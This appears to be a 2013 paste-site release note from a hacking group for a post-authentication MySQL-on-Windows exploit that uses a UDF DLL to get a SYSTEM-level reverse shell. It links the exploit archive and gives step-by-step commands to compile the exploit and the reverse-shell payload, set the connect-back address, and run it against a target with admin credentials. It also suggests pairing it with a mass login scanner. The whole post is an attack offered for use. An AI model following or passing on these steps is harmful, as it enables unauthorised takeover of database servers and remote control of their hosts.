MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:04 p.m.

FORMAT: Text only

SIZE: 1.7 kB

HITS: 2205

  1. ***
  2. FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
  3. ***
  4. Attached is the MySQL Windows Remote Exploit (post-auth, udf
  5. technique) including the previously released mass scanner.
  6. The exploit is mirrored at the farlight website http://www.farlight.org.
  7. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
  8. All owned By Kingcope
  9. http://www.exploit-db.com/sploits/23073.tar.gz
  10. Installation Instructions
  11. =============================
  12. 1. Install mysql client libraries and headers (UNIX)
  13. RedHat based (e.g. CentOS):
  14. yum install mysql mysql-devel
  15. 2. Compile the standalone exploit
  16. issue commands:
  17. gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient
  18. 3. Compile the reverse shell payload (this is required!)
  19. required because the connect back ip and port are hardcoded in the dll:
  20. use mingw on windows or wine
  21. change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
  22. to change the port in mysqljackpot.c too (default port: 443).
  23. issue commands:
  24. set PATH=%PATH%;c:\MinGW\bin\
  25. gcc -c payload.c
  26. gcc -shared -o payload.dll payload.o -lws2_32
  27. copy the payload.dll into the mysqljackpot exploit folder
  28. 4. Run The Exploit
  29. ./mysqljackpot -u root -p "" -t 99.99.99.99
  30. A valid database admin user and his password are required
  31. for the exploit to work properly.
  32. This exploit is especially useful when used in connection
  33. to a MySQL login scanner, see scanner/README.mysql inside this package.
  34. Be sure to have the firewall open on the desired reverse port
  35. on the attacking machine.
  36. 5. Enjoy your SYSTEM Shell!!!
  37. Yours Sincerely,
  38. -- Kingcope

comments powered by Disqus